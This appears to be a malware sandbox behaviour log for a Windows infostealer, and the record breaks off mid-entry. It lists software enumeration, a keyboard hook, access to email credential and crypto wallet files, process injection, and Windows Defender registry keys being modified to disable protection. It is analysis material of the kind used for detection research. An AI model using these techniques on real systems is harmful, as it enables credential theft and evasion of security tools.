regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Reader 9
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x0000037c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000394
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003ac
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003bc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003fc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000418
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000420
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000428
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000430
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000438
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000440
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000448
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000450
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000458
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000460
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x004ca8cc
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00000000
1 262667 0
file C:\Users\test22\AppData\Roaming\Thunderbird\Profiles\hzkyl8yo.default
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2
registry HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
process GDSFbnvfghsrf.exe useragent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process Fdfgrytbvdfsd.exe useragent
process rc.exe useragent zipo
process rc.exe useragent aswe
Process injection Process 2424 called NtSetContextThread to modify thread in remote process 2604
Process injection Process 2520 called NtSetContextThread to modify thread in remote process 2708
Process injection Process 2556 called NtSetContextThread to modify thread in remote process 2760
Process injection Process 2568 called NtSetContextThread to modify thread in remote process 3844
Process injection Process 2780 called NtSetContextThread to modify thread in remote process 2532
Process injection Process 2852 called NtSetContextThread to modify thread in remote process 4008
Process injection Process 2856 called NtSetContextThread to modify thread in remote process 3184
Process injection Process 200 called NtSetContextThread to modify thread in remote process 2464
Process injection Process 3284 called NtSetContextThread to modify thread in remote process 3156
Process injection Process 3356 called NtSetContextThread to modify thread in remote process 3248
Process injection Process 3404 called NtSetContextThread to modify thread in remote process 4076
Process injection Process 3476 called NtSetContextThread to modify thread in remote process 3936
Process injection Process 3548 called NtSetContextThread to modify thread in remote process 3316
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 4804608
registers.esp: 1638384
registers.edi: 0
registers.eax: 4456511
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000230
process_identifier: 2604
1 0 0

NtSetContextThread

 registers.eip: 4325376
registers.esp: 1638384
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000118
process_identifier: 2708
1 0 0

NtSetContextThread

 registers.eip: 4407296
registers.esp: 1638384
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 2004287940
thread_handle: 0x00000118
process_identifier: 2760
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4245278
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000370
process_identifier: 3844
1 0 0

NtSetContextThread

 registers.eip: 100630528
registers.esp: 1523712
registers.edi: 0
registers.eax: 8267568
registers.ebp: 71901521
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000538
process_identifier: 2532
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4219246
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002bc
process_identifier: 4008
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4209646
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 3184
1 0 0

NtSetContextThread

 registers.eip: 58588080
registers.esp: 72138752
registers.edi: 0
registers.eax: 4200932
registers.ebp: 71468560
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000530
process_identifier: 2464
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4245278
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000036c
process_identifier: 3156
1 0 0

NtSetContextThread

 registers.eip: 93094892
registers.esp: 6078464
registers.edi: 0
registers.eax: 8267568
registers.ebp: 72098129
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000534
process_identifier: 3248
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4219246
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a0
process_identifier: 4076
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4209646
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a8
process_identifier: 3936
1 0 0

NtSetContextThread

 registers.eip: 5328
registers.esp: 72772396
registers.edi: 0
registers.eax: 4200932
registers.ebp: 16384
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000534
process_identifier: 3316
1 0 0
file C:\Users\test22\AppData\Roaming\Identities\.wallet
file C:\Users\test22\AppData\Roaming\Mozilla\.wallet
file C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe\.wallet
file C:\Users\test22\AppData\.wallet
file C:\Users\test22\AppData\Roaming\Thunderbird\wallets\.wallet
file C:\Users\test22\AppData\Roaming\EditPlus\.wallet
file C:\Users\test22\AppData\Roaming\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Sun\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Macromedia\.wallet
file C:\Users\test22\AppData\Roaming\.wallet
file C:\Users\test22\AppData\Roaming\HNC\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Microsoft\.wallet
file C:\Users\test22\AppData\Roaming\Adobe\wallets\.wallet
file C:\Users\test22\AppData\Roaming\HNC\.wallet
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file C:\Users\test22\AppData\Roaming\Microsoft\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Mozilla\wallets\.wallet
file C:\Users\test22\AppData\Roaming\EditPlus\wallets\.wallet
file C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe\.wallet
file C:\Users\test22\AppData\wallets\.wallet
file C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Identities\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Thunderbird\.wallet
file C:\Users\test22\AppData\Roaming\Macromedia\wallets\.wallet
file C:\Users\test22\AppData\Roaming\Adobe\.wallet
file C:\Users\test22\AppData\Roaming\Sun\.wallet
file C:\Users\test22\AppData\Local\Temp\zxcv.EXE
file C:\Users\test22\AppData\Local\Temp\tmpA553.tmp
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozMapi32.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleMarshal.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll
file C:\Users\test22\AppData\LocalLow\XwwWWhCD6d4.zip
file C:\Users\test22\AppData\LocalLow\qT1wG2cI7tX5f
file C:\Users\test22\AppData\LocalLow\1hOwHQIETH
file C:\Users\test22\AppData\LocalLow\rQF69AzBla
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\RYwTiizs2t
file C:\Users\test22\AppData\LocalLow\foxmail.temp
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\IA2Marshal.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\sY9eU8qD7hB3_m.zip
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\qipcap.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldif60.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\MapiProxy.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\frAQBc8Wsa
file C:\Users\test22\AppData\LocalLow\chrome_urls.txt
file C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll
Process injection Process 2424 resumed a thread in remote process 2604
Process injection Process 2520 resumed a thread in remote process 2708
Process injection Process 2556 resumed a thread in remote process 2760
Process injection Process 2568 resumed a thread in remote process 3844
Process injection Process 2780 resumed a thread in remote process 2532
Process injection Process 2852 resumed a thread in remote process 4008
Process injection Process 2856 resumed a thread in remote process 3184
Process injection Process 200 resumed a thread in remote process 2464
Process injection Process 2928 resumed a thread in remote process 556
Process injection Process 3136 resumed a thread in remote process 3196
Process injection Process 3284 resumed a thread in remote process 3156
Process injection Process 3356 resumed a thread in remote process 3248
Process injection Process 3404 resumed a thread in remote process 4076
Process injection Process 3476 resumed a thread in remote process 3936
Process injection Process 3548 resumed a thread in remote process 3316
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2604
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x00000118
suspend_count: 1
process_identifier: 2760
1 0 0

NtResumeThread

 thread_handle: 0x00000370
suspend_count: 1
process_identifier: 3844
1 0 0

NtResumeThread

 thread_handle: 0x00000538
suspend_count: 1
process_identifier: 2532
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 4008
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 3184
1 0 0

NtResumeThread

 thread_handle: 0x00000530
suspend_count: 1
process_identifier: 2464
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 556
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 3196
1 0 0

NtResumeThread

 thread_handle: 0x0000036c
suspend_count: 1
process_identifier: 3156
1 0 0

NtResumeThread

 thread_handle: 0x00000534
suspend_count: 1
process_identifier: 3248
1 0 0

NtResumeThread

 thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 4076
1 0 0

NtResumeThread

 thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 3936
1 0 0

NtResumeThread

 thread_handle: 0x00000534
suspend_count: 1
process_identifier: 3316
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

 net_type: 0x00250000
1222 0
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2524
thread_handle: 0x000002a0
process_identifier: 2520
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe"
filepath_r: C:\Users\test22\AppData\Roaming\GDSFbnvfghsrf.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a8
1 1 0

CreateProcessInternalW

 thread_identifier: 2560
thread_handle: 0x000002a0
process_identifier: 2556
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Fdfgrytbvdfsd.exe
stack_pivoted: 0
